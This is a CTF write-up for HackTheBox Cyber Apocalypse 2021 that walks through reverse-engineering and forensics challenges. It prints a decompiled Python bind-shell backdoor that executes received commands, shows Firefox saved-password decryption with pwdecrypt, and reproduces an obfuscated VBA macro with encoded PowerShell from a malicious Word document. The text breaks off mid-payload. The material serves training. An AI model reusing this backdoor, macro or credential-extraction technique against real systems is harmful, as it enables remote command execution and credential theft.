wannaShare | Writeup CTF HackTheBox Cyber Apocalypse 2021 | Reverse Engineering + Web Exploitation + Forensics + Hardware

PHAPHA_JIàN
11:15 01/05/2021

5 days with Hack The Box

Author: Stirring + n3m0

Team: Sp33ch_0f_T1m3 + Anti_Wannaone

Nhóm Wanna.One chia sẻ một số Challenges giải được và việc chia sẻ writeup nhằm mục đích giao lưu học thuật. Mọi đóng-góp ý-kiến bọn mình luôn-luôn tiếp nhận qua mail: wannaone.uit@gmail.com

HTB

1.Authenticator

rev_authenticator.zip

image

if ( ((unsigned __int8)aAVhAG8j89gvPDv[i] ^ 9) != a1[i] )

image

──(kali㉿kali)-[~/Desktop/ReverseHTB]
└─$ python3                                                   1 ⚙
Python 3.9.2 (default, Feb 28 2021, 17:03:44) 
[GCC 10.2.1 20210110] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> flag = "}a:Vh|}a:g}8j=}89gV<p<}:dV8<Vg9}V<9V<:j|{:"
>>> xor = 0x9
>>> decode_flag = [chr(ord(x)^xor) for x in flag]
>>> "".join(decode_flag)
'th3_auth3nt1c4t10n_5y5t3m_15_n0t_50_53cur3'
>>> 
zsh: suspended python3

┌──(kali㉿kali)-[~/Desktop/ReverseHTB]
└─$ ./authenticator                                            148 ⨯ 2 ⚙

Authentication System ?                                               

Please enter your credentials to continue.                                      

Alien ID: 11337                                                   
Pin: th3_auth3nt1c4t10n_5y5t3m_15_n0t_50_53cur3                                   
Access Granted! Submit pin in the flag format: CHTB{fl4g_h3r3}

So we got the flag: CHTB{th3_auth3nt1c4t10n_5y5t3m_15_n0t_50_53cur3}

2.Passphrase

rev_passphrase.zip

image

image

┌──(kali㉿kali)-[~/Desktop/ReverseHTB/Passphrase]
└─$ ltrace ./passphrase                                               4 ⚙
setbuf(0x7f95be3186a0, 0)                         = <void>
strlen("\nHalt! \342\233\224")                      = 10
putchar(10, 0, 0x55d21b000bc8, 8
)                     = 10
.......
strlen("\nYou do not look familiar..")                  = 27
putchar(105, 0, 0x55d21b000bd3, 19i)                    = 105
usleep(30000)                               = <void>
strlen("\nYou do not look familiar..")                  = 27
putchar(97, 0, 0x55d21b000bd3, 19a)                    = 97
usleep(30000)                               = <void>
strlen("\nYou do not look familiar..")                  = 27
putchar(114, 0, 0x55d21b000bd3, 19r)                    = 114
usleep(30000)                               = <void>
strlen("\nYou do not look familiar..")                  = 27
putchar(46, 0, 0x55d21b000bd3, 19.)                    = 46
usleep(30000)                               = <void>
strlen("\nYou do not look familiar..")                  = 27
putchar(46, 0, 0x55d21b000bd3, 19.)                    = 46
usleep(30000)                               = <void>
strlen("\nYou do not look familiar..")                  = 27
sleep(1)                                 = 0
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(10, 0, 0x55d21b000bf0, 16
)                    = 10
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(84, 0, 0x55d21b000bf0, 16T)                    = 84
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(101, 0, 0x55d21b000bf0, 16e)                    = 101
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(108, 0, 0x55d21b000bf0, 16l)                    = 108
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(108, 0, 0x55d21b000bf0, 16l)                    = 108
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(32, 0, 0x55d21b000bf0, 16 )                    = 32
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(109, 0, 0x55d21b000bf0, 16m)                    = 109
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(101, 0, 0x55d21b000bf0, 16e)                    = 101
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(32, 0, 0x55d21b000bf0, 16 )                    = 32
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(116, 0, 0x55d21b000bf0, 16t)                    = 116
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(104, 0, 0x55d21b000bf0, 16h)                    = 104
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(101, 0, 0x55d21b000bf0, 16e)                    = 101
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(32, 0, 0x55d21b000bf0, 16 )                    = 32
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(115, 0, 0x55d21b000bf0, 16s)                    = 115
usleep(30000)                               = <void>
......
putchar(58, 0, 0x55d21b000bf0, 16:)                    = 58
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
putchar(32, 0, 0x55d21b000bf0, 16 )                    = 32
usleep(30000)                               = <void>
strlen("\nTell me the secret passphrase: "...)              = 32
sleep(1)                                 = 0
fgets(123
"123\n", 40, 0x7f95be317980)                    = 0x7ffd03351f80
strlen("123\n")                              = 4
strcmp("3xtr4t3rR3stR14L5_VS_hum4n5", "123")               = 2
printf("\033[31m")                            = 5
strlen("\nIntruder alert! \360\237\232\250\n")              = 22                      
putchar(10, 0x7ffd0334f8e0, 0x55d21b000c17, 23                                      
)              = 10                                             
usleep(30000)                               = <void>                    
strlen("\nIntruder alert! \360\237\232\250\n")              = 22                      
putchar(73, 0, 0x55d21b000c17, 23I)                    = 73                     
usleep(30000)                               = <void>                    
strlen("\nIntruder alert! \360\237\232\250\n")              = 22                      
putchar(110, 0, 0x55d21b000c17, 23n)                    = 110                     
usleep(30000)                               = <void>                    
strlen("\nIntruder alert! \360\237\232\250\n")              = 22                      
putchar(116, 0, 0x55d21b000c17, 23t)                    = 116                     
usleep(30000)                               = <void>                    
strlen("\nIntruder alert! \360\237\232\250\n")              = 22                      
putchar(114, 0, 0x55d21b000c17, 23r)                    = 114                     
usleep(30000)                               = <void>                    
....             
┌──(kali㉿kali)-[~/Desktop/ReverseHTB/Passphrase]
└─$ ./passphrase                                                   4 ⚙

Halt! ⛔
You do not look familiar..
Tell me the secret passphrase: 3xtr4t3rR3stR14L5_VS_hum4n5
✔

Sorry for suspecting you, please transfer this important message to the chief: CHTB{3xtr4t3rR3stR14L5_VS_hum4n5} 

Yep, So we got the flag: CHTB{3xtr4t3rR3stR14L5_VS_hum4n5}

3.Backdoor

rev_backdoor.zip

image

┌──(kali㉿kali)-[~/Desktop/ReverseHTB/backdoor]
└─$ file bd                                                  100 ⨯ 1 ⚙
bd: ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=1da3a1d77c7109ce6444919f4a15e7e6c63d02fa, stripped

┌──(kali㉿kali)-[~/Desktop/ReverseHTB/backdoor]
└─$ chmod +x bd                                                   1 ⚙

┌──(kali㉿kali)-[~/Desktop/ReverseHTB/backdoor]
└─$ ./bd                     
┌──(kali㉿kali)-[~/Desktop/ReverseHTB/backdoor]
└─$ objcopy --dump-section pydata=pydata.dump bd

┌──(kali㉿kali)-[~/Desktop/ReverseHTB/backdoor]
└─$ ls  
bd pydata.dump
┌──(kali㉿kali)-[~/Desktop/ReverseHTB/backdoor]
└─$ python pyinstxtractor/pyinstxtractor.py pydata.dump 
[+] Processing pydata.dump
[+] Pyinstaller version: 2.1+
[+] Python version: 38
[+] Length of package: 6994886 bytes
[+] Found 45 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: pyi_rth_multiprocessing.pyc
[+] Possible entry point: bd.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python38 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: pydata.dump

You can now use a python decompiler on the pyc files within the extracted directory
┌──(kali㉿kali)-[~/Desktop/ReverseHTB/backdoor]
└─$ decompyle3 pydata.dump_extracted/bd.pyc  
# decompyle3 version 3.3.2
# Python bytecode 3.8 (3413)
# Decompiled from: Python 3.8.5 (default, Aug 2 2020, 15:09:07) 
# [GCC 10.2.0]
# Embedded file name: bd.py
import socket
from hashlib import md5
from subprocess import check_output
sock = socket.socket()
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
sock.bind(('0.0.0.0', 4433))
sock.listen(5)
while True:
  while True:
    client, addr = sock.accept()
    data = client.recv(32)
    if len(data) != 32:
      client.close()

    if data.decode() != md5(b's4v3_th3_w0rld').hexdigest():
      client.send(b'Invalid')
      client.close()
    else:
      size = client.recv(1)
      command = client.recv(int.from_bytes(size, 'little'))
      if not command.startswith(b'command:'):
        client.close()
      else:
        command = command.replace(b'command:', b'')
        output = check_output(command, shell=True)
        client.send(output)
        client.close()
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vvv 0.0.0.0 1234                
0.0.0.0: inverse host lookup failed: Unknown host
(UNKNOWN) [0.0.0.0] 1234 (?) open
s4v3_th3_w0rld
command:ls
bd
fixbd.py
flag.txt
pydata.dump
pydata.dump_extracted
pyinstxtractor
python-decompile3
 sent 26, rcvd 88
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -vvv 0.0.0.0 1234                  
0.0.0.0: inverse host lookup failed: Unknown host
(UNKNOWN) [0.0.0.0] 1234 (?) open
s4v3_th3_w0rld
command:cat flag.txt
CHTB{b4ckd00r5_4r3_d4nG3r0u5}
Goodjob!!!
 sent 36, rcvd 41

So we got the flag: CHTB{b4ckd00r5_4r3_d4nG3r0u5}

/Forensics/

image

1. Oldest trick in the book

Forensics_Oldest_Trick.zip

image

image

image

tshark -r older_trick.pcap -Y "ip.dst == 192.168.1.8" -T fields -e data.data > raw

image

#!usr/bin/env python3
flag = []

with open('raw', 'r') as file:
  text = file.readlines()

for payload in text:
  flag.append(bytearray.fromhex(payload[16:48]))

with open('flag.zip', 'wb') as out_file:
  out_file.write(b''.join(flag))
 ```
 ![image](https://user-images.githubusercontent.com/62060867/115963373-35476880-a549-11eb-90ef-ed738643e739.png)

*So we have a zip file, unzip it

 ┌──(kali㉿kali)-[~/Desktop/older]
└─$ unzip flag.zip 
Archive: flag.zip
 extracting: fini/addons.json
 inflating: fini/addonStartup.json.lz4
 inflating: fini/broadcast-listeners.json
 inflating: fini/cert9.db
 inflating: fini/compatibility.ini
 inflating: fini/containers.json
 inflating: fini/content-prefs.sqlite
 inflating: fini/cookies.sqlite
 inflating: fini/cookies.sqlite-shm
 inflating: fini/cookies.sqlite-wal
 inflating: fini/extension-preferences.json
 inflating: fini/extensions.json
 inflating: fini/favicons.sqlite
 inflating: fini/favicons.sqlite-shm
 inflating: fini/favicons.sqlite-wal
 inflating: fini/formhistory.sqlite
 inflating: fini/handlers.json
 inflating: fini/key4.db
 inflating: fini/logins.json
 inflating: fini/permissions.sqlite
 inflating: fini/pkcs11.txt
 inflating: fini/places.sqlite
 inflating: fini/places.sqlite-shm
 inflating: fini/places.sqlite-wal
 inflating: fini/prefs.js
 inflating: fini/protections.sqlite
 inflating: fini/search.json.mozlz4
 inflating: fini/sessionCheckpoints.json
 extracting: fini/shield-preference-experiments.json
 inflating: fini/SiteSecurityServiceState.txt
 inflating: fini/storage.sqlite
 inflating: fini/times.json
 inflating: fini/webappsstore.sqlite 
 inflating: fini/webappsstore.sqlite-shm
 inflating: fini/webappsstore.sqlite-wal
 inflating: fini/xulstore.json
┌──(kali㉿kali)-[~/Desktop/older]
└─$ cd fini
┌──(kali㉿kali)-[~/Desktop/older/fini]
└─$ sudo apt-get install jq
Reading package lists... Done
Building dependency tree... Done
Reading state information... Done
jq is already the newest version (1.6-2.1).
0 upgraded, 0 newly installed, 0 to remove and 394 not upgraded.
┌──(kali㉿kali)-[~/Desktop/older/fini]
└─$ jq -r -S '.logins[] | .hostname, .encryptedUsername, .encryptedPassword' logins.json | pwdecrypt -d . -p foobar
https://rabbitmq.makelarid.es
Decrypted: "Frank_B"
Decrypted: "CHTB{long_time_no_s33_icmp}"

So we have Flag: CHTB{long_time_no_s33_icmp}

2.Key mission

Forensics_Key_Mission.zip

image

image

image

image

image

┌──(kali㉿kali)-[~/Desktop/key_mission]
└─$ cat hexoutput.txt
0200000000000000
02000c0000000000
0200000000000000
0000000000000000
00002c0000000000
0000000000000000
0000040000000000
0000041000000000
0000100000000000
0000000000000000
00002c0000000000
0000160000000000
0000160800000000
0000080000000000
0000000000000000
0000110000000000
0000000000000000
.....
.....
!/usr/bin/python

from __future__ import print_function
import sys,os

lcasekey = {}

ucasekey = {}

lcasekey[4]="a";      ucasekey[4]="A"
lcasekey[5]="b";      ucasekey[5]="B"
lcasekey[6]="c";      ucasekey[6]="C"
lcasekey[7]="d";      ucasekey[7]="D"
lcasekey[8]="e";      ucasekey[8]="E"
lcasekey[9]="f";      ucasekey[9]="F"
lcasekey[10]="g";     ucasekey[10]="G"
lcasekey[11]="h";     ucasekey[11]="H"
lcasekey[12]="i";     ucasekey[12]="I"
lcasekey[13]="j";     ucasekey[13]="J"
lcasekey[14]="k";     ucasekey[14]="K"
lcasekey[15]="l";     ucasekey[15]="L"
lcasekey[16]="m";     ucasekey[16]="M"
lcasekey[17]="n";     ucasekey[17]="N"
lcasekey[18]="o";     ucasekey[18]="O"
lcasekey[19]="p";     ucasekey[19]="P"
lcasekey[20]="q";     ucasekey[20]="Q"
lcasekey[21]="r";     ucasekey[21]="R"
lcasekey[22]="s";     ucasekey[22]="S"
lcasekey[23]="t";     ucasekey[23]="T"
lcasekey[24]="u";     ucasekey[24]="U"
lcasekey[25]="v";     ucasekey[25]="V"
lcasekey[26]="w";     ucasekey[26]="W"
lcasekey[27]="x";     ucasekey[27]="X"
lcasekey[28]="y";     ucasekey[28]="Y"
lcasekey[29]="z";     ucasekey[29]="Z"
lcasekey[30]="1";     ucasekey[30]="!"
lcasekey[31]="2";     ucasekey[31]="@"
lcasekey[32]="3";     ucasekey[32]="#"
lcasekey[33]="4";     ucasekey[33]="$"
lcasekey[34]="5";     ucasekey[34]="%"
lcasekey[35]="6";     ucasekey[35]="^"
lcasekey[36]="7";     ucasekey[36]="&"
lcasekey[37]="8";     ucasekey[37]="*"
lcasekey[38]="9";     ucasekey[38]="("
lcasekey[39]="0";     ucasekey[39]=")"
lcasekey[40]="Enter";   ucasekey[40]="Enter"
lcasekey[41]="esc";    ucasekey[41]="esc"
lcasekey[42]="del";    ucasekey[42]="del"
lcasekey[43]="tab";    ucasekey[43]="tab"
lcasekey[44]="space";   ucasekey[44]="space"
lcasekey[45]="-";     ucasekey[45]="_"
lcasekey[46]="=";     ucasekey[46]="+"
lcasekey[47]="[";     ucasekey[47]="{"
lcasekey[48]="]";     ucasekey[48]="}"
lcasekey[49]="\\";     ucasekey[49]="|"
lcasekey[50]=" ";     ucasekey[50]=" "
lcasekey[51]=";";     ucasekey[51]=":"
lcasekey[52]="'";     ucasekey[52]="\""
lcasekey[53]="`";     ucasekey[53]="~"
lcasekey[54]=",";     ucasekey[54]="<"
lcasekey[55]=".";     ucasekey[55]=">"
lcasekey[56]="/";     ucasekey[56]="?"
lcasekey[57]="CapsLock";  ucasekey[57]="CapsLock"
lcasekey[79]="RightArrow"; ucasekey[79]="RightArrow"
lcasekey[80]="LeftArrow"; ucasekey[80]="LeftArrow"
lcasekey[84]="/";     ucasekey[84]="/"
lcasekey[85]="*";     ucasekey[85]="*"
lcasekey[86]="-";     ucasekey[86]="-"
lcasekey[87]="+";     ucasekey[87]="+"
lcasekey[88]="Enter";   ucasekey[88]="Enter"
lcasekey[89]="1";     ucasekey[89]="1"
lcasekey[90]="2";     ucasekey[90]="2"
lcasekey[91]="3";     ucasekey[91]="3"
lcasekey[92]="4";     ucasekey[92]="4"
lcasekey[93]="5";     ucasekey[93]="5"
lcasekey[94]="6";     ucasekey[94]="6"
lcasekey[95]="7";     ucasekey[95]="7"
lcasekey[96]="8";     ucasekey[96]="8"
lcasekey[97]="9";     ucasekey[97]="9"
lcasekey[98]="0";     ucasekey[98]="0"
lcasekey[99]=".";     ucasekey[99]="."

if len(sys.argv) == 2:
  keycodes = open(sys.argv[1])
  for line in keycodes:
    bytesArray = bytearray.fromhex(line.strip())
    val = int(bytesArray[2])
    if val > 3 and val < 100:
        if bytesArray[0] == 0x02 or bytesArray[0] == 0x20 :
        print(ucasekey[int(bytesArray[2])], end=''), #single line output

      else:
        print(lcasekey[int(bytesArray[2])], end=''), #single line output 
else:
  print("USAGE: python %s [filename]" % os.path.basename(__file__))
──(kali㉿kali)-[~/Desktop/key_mission]
└─$ python script.py hexoutput.txt | grep CHTB  130 ⨯
Ispaceaamspacessendinfdeldelgspacessecrretary'sspaceloccationspaceoveerspacethisspacetottallyspaceencryptedspacechannelspacetospacemakespacesurrespacenospaceonespaceelssespacewillspacebespaceablespacetospacespacerreeatdeldeldspaceittspaceexcepptspaceofspaceus.spaceTthisspaceinformmaationspaceissspaceconfiddentialspaceandspacemustspacenotspacebespacesharredspacewithspaceanyonespaceelsse.spaceTthespacespacessecrretary'sspacehiddenspacelooccationspaceisspaceCHTB{a_place=3deldel-3deldel_3deldeldel3_fAr_fAar_awway_ffr0m_eearth}Enter

Oh you here CHTB{a_place=3deldel-3deldel_3deldeldel3_fAr_fAar_awway_ffr0m_eearth}. Tưởng mọi việc đã xong copy và submit ?

 • Wrong flag tèn ten
 • Fake flag, oh no. Sau đó Duytayto đã nhìn ra được quy luật của strings này
  I aam -> I am
  ssendinfdeldelg -> sending
  deldel = backspace
 • Đây mới chính là cái ta cần tìm CHTB{a_plac3_fAr_fAr_away_fr0m_earth}

  So we got the flag: CHTB{a_plac3_fAr_fAr_away_fr0m_earth}

3.Invitation

forensics_invitation.zip

image

┌──(kali㉿kali)-[~/Desktop/Invitation]
└─$ unzip invite.docm       
Archive: invite.docm
 inflating: [Content_Types].xml   
 inflating: _rels/.rels       
 inflating: word/document.xml    
 inflating: word/_rels/document.xml.rels 
 inflating: word/vbaProject.bin   
 extracting: word/media/image1.png  
 inflating: word/theme/theme1.xml  
 inflating: word/_rels/vbaProject.bin.rels 
 inflating: word/vbaData.xml    
 inflating: word/settings.xml    
 inflating: word/styles.xml     
 inflating: word/webSettings.xml  
 inflating: word/fontTable.xml   
 inflating: docProps/core.xml    
 inflating: docProps/app.xml    

┌──(kali㉿kali)-[~/Desktop/Invitation]
└─$ tree
.
├── [Content_Types].xml
├── docProps
│  ├── app.xml
│  └── core.xml
├── invite.docm
├── _rels
└── word
  ├── document.xml
  ├── fontTable.xml
  ├── media
  │  └── image1.png
  ├── _rels
  │  ├── document.xml.rels
  │  └── vbaProject.bin.rels
  ├── settings.xml
  ├── styles.xml
  ├── theme
  │  └── theme1.xml
  ├── vbaData.xml
  ├── vbaProject.bin
  └── webSettings.xml

6 directories, 15 files
┌──(kali㉿kali)-[~/Desktop/Invitation/word]
└─$ olevba vbaProject.bin | more       147 ⨯ 1 ⚙
olevba 0.56.1 on Python 3.9.2 - http://decalage.info/pyt
hon/oletools
========================================================
=======================
FILE: vbaProject.bin
Type: OLE
--------------------------------------------------------
-----------------------
VBA MACRO ThisDocument.cls 
in file: vbaProject.bin - OLE stream: 'VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - 
- - - - - - - - - - - 
Dim bomazpcuwhstlcd As String
Dim dbcsmjrdsqm As String
Dim gxiwcxqzqi As String
Dim uejdkidq As String
bomazpcuwhstlcd = odsuozldxufm("4c674167414367414941416b
414641416377426f4147384162514246414673414e41426441437341
4a41427741484d4161414276414530415a51426241444d414d414264
414373414a774234414363414b514167414367414941426241484d41
6441427941476b4162674248414630414f67413641476f4162774270
4147") & odsuozldxufm("34414b41416e") & _
odsuozldxufm("4143634149414173414341414b4142624146494152
") & odsuozldxufm("514248414755415741426441446f414f67424
e41474541564142444145674152514254414367414941416941436b4
14a774234414363414b77426441444d414d514262414551415351427
3414577415a51424941484d414a414172414630414d5142624145514
16151424d41457741") & _
odsuozldxufm("5a51426f41484d414a414167414367414a67423841
4341414b51413041444d4158514253414545416141426a4146734158
51424841473441535142534146514163774262414377414a77423041
4667416167416e414367415a51424441454541544142514145554155
67417541436b414a77416b414363414c41416e41486341") & odsuo
zldxufm("63514270") & _
odsuozldxufm("414363414b41426c41454d415151424d4146414152
514253414334414b51416e4144734164414259414363414b77416e41
476f415a514279414745415877427a41474d416277426b4147774159
514274414363414b77416e") & odsuozldxufm("414873415167416
e414373414a774255414363414b77416e41456741517742304146674
16167416741436341") & _
odsuozldxufm("4b77416e4144304149414277414363414b77416e41
4763415a5142794148634163514270414363414b414169414341414c
41416e414334414a774167414377414a774253414363414b77416e41
476b41527742494146514164414250414777414a774172414363415a
51426d414851414a77416741436b414941423841434141526742") &
 odsuozldxufm("76") & _
odsuozldxufm("414649415251426841454d41534141744145384151
67424b4147554159774255414341416577416b414638414c67425741
45454154414256414555416651416741436b414b514167414341414b
51414b41416f414367416b4148414159514235414777416277426841

...

*Hmmm mình sẽ cố gắng giải mã các biểu thức VBA bằng deobfuscate và hiển thị mã nguồn macro sau khi thay thế tất cả các chuỗi bị xáo trộn bằng nội dung được giải mã của chúng

olevba --decode --deobf --reveal vbaProject.bin
┌──(kali㉿kali)-[~/Desktop/Invitation/word]
└─$ olevba --decode --deobf --reveal vbaProject.bin
......
Dim bomazpcuwhstlcd As String
Dim dbcsmjrdsqm As String
Dim gxiwcxqzqi As String
Dim uejdkidq As String
bomazpcuwhstlcd = "b'LgAgACgAIAAkAFAAcwBoAG8AbQBFAFsANABdACsAJABwAHMAaABvAE0AZQBbADMAMABdACsAJwB4ACcAKQAgACgAIABbAHMAd
AByAGkAbgBHAF0AOgA6AGoAbwBpAG'b'4AKAAn'b'ACcAIAAsACAAKABbAFIAR'b'QBHAGUAWABdADoAOgBNAGEAVABDAEgARQBTACgAIAAiACkAJwB4AC
cAKwBdADMAMQBbAEQASQBsAEwAZQBIAHMAJAArAF0AMQBbAEQAaQBMAEwA'b'ZQBoAHMAJAAgACgAJgB8ACAAKQA0ADMAXQBSAEEAaABjAFsAXQBHAG4AS
QBSAFQAcwBbACwAJwB0AFgAagAnACgAZQBDAEEATABQAEUAUgAuACkAJwAkACcALAAnAHcA'b'cQBp'b'ACcAKABlAEMAQQBMAFAARQBSAC4AKQAnADsAd
ABYACcAKwAnAGoAZQByAGEAXwBzAGMAbwBkAGwAYQBtACcAKwAn'b'AHsAQgAnACsAJwBUACcAKwAnAEgAQwB0AFgAagAgACcA'b'KwAnAD0AIABwACcAK
wAnAGcAZQByAHcAcQBpACcAKAAiACAALAAnAC4AJwAgACwAJwBSACcAKwAnAGkARwBIAFQAdABPAGwAJwArACcAZQBmAHQAJwAgACkAIAB8ACAARgB'" &
 odsuozldxufm("76b'AFIARQBhAEMASAAtAE8AQgBKAGUAYwBUACAAewAkAF8ALgBWAEEATABVAEUAfQAgACkAKQAgACAAKQAKAAoACgAkAHAAYQB5AGw
AbwBhAGQAQgBhAHM'b'AZQA2ADQAIAA9ACAA'b'IgBKAEEAQgBqAEEARwB3AEEAYQBRAEIAbABBAEcANABBAGQAQQBBAGcAQQBEADAAQQBJAEEAQgBPAEE
ARwBV'b'AEEAZAB3AEEAdABBAEUAOABBAFkAZwBCAHEAQQBHAFUAQQBZ'b'AHcAQgAwAEEAQwBBAEEAVQB3AEIANQBBAEgATQBBAGQAQQBCAGwAQQBHADA
AQQBMAGcAQgBPAEEARwBVAEEAZABBAEEAdQBBAEYATQBBAGIA'b'dwBCAGoAQQBHAHMAQQBaAFEA'b'QgAwAEEASABNAEEATABnAEIAVQBBAEUATQBBAFU
AQQBCAEQAQQBHAHcAQQBhAFEAQgBsAEEARwA0AEEAZABBAEEAbwBBAEMASQBBAE0AUQBBADUAQQBEAFkAQQ'b'BMAGcAQQB5'b'AEEARABNAEEATQB3AEE
AegBBAEMANABBAE4AUQBBADAAQQBDADQAQQBNAGcAQQBpAEEAQwB3AEEATgBBA'b'EEAMABBAEQAUQBBAE4AQQBBAHAAQQBEAHMAQQBKAEEAQgB6AEEA'b
'SABRAEEAYwBnAEIAbABBAEcARQBBAGIAUQBBA'b'GcAQQBEADAAQQBJAEEAQQBrAEEARwBNAEEAYgBBAEIAcABBAEcAVQBBAGIAZwBCADAAQQBDADQAQQ
BSAHcAQgBsAEEASABR'b'AEEAVQB3AEIAMABBAEgASQBBAFoAUQBCAGgAQQBHADAAQQBLAEEAQQBwAEEARABzAEEAVwB3AEIAaQBBAEgAawBBAGQAQQBCA
GwAQQBGAHMAQQB'b'YAFEAQgBkAEEAQwBRAEEA'b'WQBnAEIANQBBAEgAUQBBAFoAUQBCAHoAQQBDAEEAQQBQAFEAQQBnAEEARABBAEEATABnAEEAdQBBA
EQAWQBBAE4AUQBBADEA'b'QQBEAE0AQQBOAFEAQgA4AEEAQwBVAEEAZQB3'b'AE'b'EAdwBBAEgAMABBAE8AdwBCADMAQQBHAGcAQQBhAFEAQgBzAEEARw
BVAEEASwBBAEEAbwBBAEMAUQBBAGEAUQBBAGcAQQBEADAAQQBJAEEAQQBrAEEASABNAEEAZABBAEIA'b'eQBBAEcAVQBB'b'AFkAUQBCAHQAQQBDADQAQQ
BVAGcAQgBsAEEARwBFAEEAWgBBAEEAbwBBAEMAUQBBAFkAZwBCADUAQQBIAFEAQQBaAFEAQgB6AEEAQwB3AEEASQBBAEEAdwBB'b'AEMAdwBBAEkAQQBBA
GsAQQBHAEkAQQBlAFEAQgAwAEEARwBVAEEAYwB3AEEAdQBBAEUAdwBBAFoAUQ'b'BCAHUAQQBHAGMAQQBkAEEAQgBvAEEAQwBrAEEASwBRAEEAZwBBAEMA
'b'MABBAGIAZwBCAGwAQQBDAEEAQQBNAEEAQQBwAEEASABz'b'AEEATwB3AEEAawBBAEcAUQBBAFkAUQBCADAAQQBHAEUAQQBJAEEAQQA5AEEAQwBBAEEA
SwBBAEIATwBBAEcAVQBB'b'AGQAdwBBAHQAQQBFADgAQQBZAGcAQgBxAEEARwBVAEEAWQB3AEIAMABBAEMAQQBBAEwA'b'UQBCAFUAQQBIAGsAQQBjAEEA
QgBsAEEARQA0AEEAWQBRAEIAdABBAEcAVQBBAEkA'b'QQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYAUQBBAFoAUQBCADQAQQB
IAFEAQQBMAGcAQgBCAEEARgBNAEEAUQB3AE'b'IASgBBAEUAawBBAFIAUQBC'b'AHUAQQBHAE0AQQBiAHcAQgBrAEEARwBrAEEAYgBnAEIAbgBBAEMAawB
BAEwA'b'ZwBCAEgAQQBHAFUAQQBkAEEAQgBUAEEASABRAEEAYwBnAEIAcABBAEcANABBAFoAdwBBAG8A'b'QQBDAFEAQQBZAGcAQgA1AEEASABRAEEAW'b
'gBRAEIAegBBAEMAdwBBAE0AQQBBAHMAQQBDAEEAQQBKAEEAQgBwAEEAQwBrAEEATwB3AEEAawBBAEgATQBBAFoAUQBCAHUAQQBH'b'AFEAQQBZAGcAQgB
oAEEARwBNAEEAYQB3AEEAZwBBAEQAMABBAEkAQQBBAG8AQQBHAGsAQQBaAFEAQ'b'gA0AEEAQwBBAEEASgBBAEIAawBBAEcARQBBAGQAQQBCAGgAQQBDAE
EA'")
dbcsmjrdsqm = "b'QQBNAGcAQQArAEEAQwBZAEEATQBRAEEAZwBBAEgAdwB'b'BAEkAQQBCAFAAQQBIAFUAQQBkAEEAQQB0AEEARgBNAEEAZABBAEIAeQ
BBAEcAawBBAGIAZwBCAG4AQQBDAEEAQQBL'b'AFEAQQA3AEEAQwBRAEEAYwB3AEIAbABBAEcANABBAFoAQQBCAGkAQQBHAEUAQQBZAHcAQgByAEEARABJ'
b'AEEASQBBAEEAZwBBAEQAMABBAEkAQQBBAGsAQQBIAE0AQQBaAFEA'b'QgB1AEEARwBRAEEAWQBnAEIAaABBAEcATQBBAGEAdwBBAGcAQQBDAHMAQQBJA
EEAQQBpAEEARgBBAEEAVQB3AEEAZwBBAEMASQBBAEkAQQB'b'BAHIAQQBDAEEAQQBLAEEAQgB3'b'AEEASABjAEEAWgBBAEEAcABBAEMANABBAFUAQQBCA
GgAQQBIAFEAQQBhAEEAQQBnAEEAQwBzAEEASQBBAEEAa'b'QBBAEQANABBAEkAQQBBAGkAQQBEAHMAQQBKAEEAQgB6AEEA'b'RwBVAEEAYgBnAEIAawBBA

...skipping 1 line
gxiwcxqzqi = "b'VAB5AHAAZQAgAC0ATgBhAG0AZQAgAFcAaQBuAG'b'QAbwB3ACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAEMAbwBuAHMAbwBsAGUAIAA
tAE0AZQBtAGIAZQByAEQAZQBmAGkAbgBp'b'AHQAaQBvAG4AIAAnAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIASwBlAHIAbgBlAGwAMwAyAC4AZABsAG
wAIgApAF0'b'ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAA'b'ZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEcAZQB0AEMAbwBuAHMAbwBsAG
UAVwBpAG4AZABvAHcAKAApADsACgAKAFsA'b'RABsAGwASQBtAHAAbwByAHQAKAAiAHUAcwBl'b'AHIAMwAyAC4AZABsAGwAIgApAF0ACgBwAHUAYgBsAG
kAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABiAG8AbwBs'b'ACAAUwBoAG8AdwBXAGkAbgBkAG8AdwAoAEkA'b'bgB0AFAAdAByACAAaABXAG
